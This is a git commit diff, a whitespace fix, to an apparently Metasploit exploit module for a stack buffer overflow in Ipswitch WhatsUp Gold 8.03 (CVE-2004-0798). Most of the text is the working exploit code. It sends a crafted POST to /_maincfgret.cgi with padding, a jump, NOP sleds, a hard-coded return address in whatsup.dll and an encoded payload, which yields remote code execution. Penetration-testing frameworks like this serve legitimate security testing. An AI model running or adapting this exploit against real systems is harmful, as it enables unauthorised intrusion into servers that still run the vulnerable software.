fixed spacing...

git-svn-id: file:///home/svn/framework3/trunk@4138 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-11-15 01:04:34 +00:00
parent dbb3cf8482
commit 6117311fe0
1 changed files with 14 additions and 15 deletions

View File

@ -20,13 +20,12 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
'References' => 'References' =>
[ [
['BID', '11043'], ['BID', '11043'],
['CVE', '2004-0798'], ['CVE', '2004-0798'],
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
}, },
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
{ {
@ -39,7 +38,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
[ [
[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll [ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 25 2004')) 'DisclosureDate' => 'Aug 25 2004'))
register_options( [ register_options( [
@ -53,19 +52,19 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
def exploit def exploit
c = connect c = connect
num = rand(65535).to_s num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n" req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
req << "page=notify&origname=&action=return&type=Beeper&instancename=" req << "page=notify&origname=&action=return&type=Beeper&instancename="
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06" req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end" req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
sploit = c.request({ req = c.request({
'uri' => '/_maincfgret.cgi', 'uri' => '/_maincfgret.cgi',
'method' => 'POST', 'method' => 'POST',
'data' => req, 'data' => req,
}) })
print_status("Trying target %s..." % target.name) print_status("Trying target %s..." % target.name)